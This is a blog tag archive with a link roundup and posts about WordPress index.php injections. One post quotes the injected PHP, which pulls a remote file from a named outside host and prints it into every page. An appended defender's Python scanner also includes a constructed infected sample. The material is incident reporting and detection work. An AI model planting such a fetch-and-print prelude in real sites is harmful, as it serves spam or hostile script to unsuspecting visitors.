Tag Archives: wordpress

Weekly Linkage: the TSA, Microwaves, and “Dot Dot Dot”

This week’s internet cruising:

Weekly linkage

This week’s internet cruising:

  • A Beginner’s Guide to Website Feedback – If I can wrap up and launch this damn character sheet app, stuff in this post will be handy for when it betas, especially the surveying. I suspect the LARPing audience will be sufficiently… opinionated to speak on it.
  • Six Useful CSS3 Tools – Some of these are pretty slick, if you're moving into CSS3 development.
  • Sharpening the blade, part MCMXVII: Nine Amazing Hours. – This is incredibly cool, and I plan to use it for a bit and see if it helps me focus.
  • Amazing Examples of Paper Art – I almost hate to link to this, in case Greg gets ideas for elaborate projects.
  • Python Business Rules Engine – Lott raises a good point about handling complex business rules, in that it's (often) cleaner and simpler to go ahead and incorporate complex business rules into the app itself rather than writing a parser to allow external entry. In my case, I have such a small user base on the side that would have been entering these rules that it's just as fine for me to do a small code release for any games added with these validation rules in them.
  • YouTube – Turkish male belly dancer "diva" – Major glitter warning, here. Major. This may be the first male bellydancer I've ever seen who wasn't mocking dancing, and he's very good. I don't like the music or the dissolve and swirling transitions, though. Or the glitter. That's a lot of glitter.
  • Amazon S3 and CloudFront with WordPress and DreamHost | .larre – This is quite a cool plugin. Not the quickest to set up with CloudFront, minifying, and combining, but worth the effort, even just for the hell of it.
  • Girl quits her job on dry erase board, emails entire office – This is apparently fake, but a cute read anyway. I’d advise against airing dirty laundry like that, though.

I’ll be damned – more WP trouble

I was fixing a webcomic issue on Greg’s blog, and I’ll be damned if from one minute to the next, it didn’t suffer from an index.php injection, too. This is weird as hell. A bunch of spurious content appeared on his homepage, although clicking through to those posts showed the correct content.

It may be time to look for alternative blagging software. Unfortunately, there are a lot of nice features that I use in WP.

WordPress PHP injection?

I just found a creepy case of injection in my index.php file. I noticed this morning that my homepage was throwing a “headers already sent” message pointing to index.php, line 10 when it wasn’t cached by Supercache. A reload of the page cleaned it up. But my RSS feed (which currently goes through Feedburner) was also trashed, and /feed wasn’t redirecting. All with the same error. Disabling Supercache fixed the homepage warning, but not the feed.

Being PHP awesome, I checked index.php for trailing whitespace, and found this snippet of code above the standard WordPress code:

<?php
if (extension_loaded("curl")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, "http://bljatdinnnnnnnnnna.net/forum.txt");
    $r = curl_exec($ch);
    curl_close($ch);
} else {
    $r=implode("",file("http://bljatdinnnnnnnnnna.net/forum.txt"));
}
if($r) print $r; // THIS IS LINE 10!
?>

That’s a problem. That forum file is, as you might expect, a crap ton of links and some JavaScript.
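
A defender's check for this kind of prelude, as an added example that is not part of the original post: it scans a WordPress index.php for remote fetches, output statements and URL literals outside comments, with line numbers. The sample files and the host injected.example are constructed, and it assumes a stock index.php only defines WP_USE_THEMES and requires wp-blog-header.php.

```python
import re

# Strings are matched first so the "//" inside a quoted URL is not read as a comment.
TOKEN = re.compile(r'''"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|/\*.*?\*/|//[^\n]*|#[^\n]*''', re.S)
FETCH = re.compile(r"\b(curl_exec|file_get_contents|fopen|file)\s*\(")
OUTPUT = re.compile(r"\b(print|echo)\b")
URL = re.compile(r"""["'](https?://[^"'\s]+)["']""")

def strip_comments(src):
    """Blank out PHP comments but keep newlines, so line numbers stay valid."""
    def blank(m):
        text = m.group(0)
        return text if text[0] in "\"'" else "\n" * text.count("\n")
    return TOKEN.sub(blank, src)

def audit_index_php(src):
    """Return remote fetches, output statements and URLs found outside comments."""
    report = {"fetch": [], "output": [], "urls": []}
    for lineno, line in enumerate(strip_comments(src).splitlines(), 1):
        report["fetch"] += [(lineno, name) for name in FETCH.findall(line)]
        if OUTPUT.search(line):
            report["output"].append(lineno)
        report["urls"] += URL.findall(line)
    return report

def is_suspicious(report):
    # Assumption: a stock index.php has no fetch call, no output statement and
    # no URL literal, so any finding is worth a manual look.
    return any(report.values())

# Constructed samples: a stock-style index.php, and one carrying a prelude shaped
# like the snippet quoted above (placeholder host, not the one from the post).
CLEAN = '''<?php
/** Front to the WordPress application. */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
'''
INFECTED = '''<?php
if (extension_loaded("curl")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://injected.example/forum.txt");
    $r = curl_exec($ch);
} else {
    $r = implode("", file("http://injected.example/forum.txt"));
}
if ($r) print $r; // injected output
?>
''' + CLEAN
```

Run `audit_index_php()` over the file's contents; the reported line numbers point at the same place a "headers already sent" warning would, since the print is what emits output before WordPress loads.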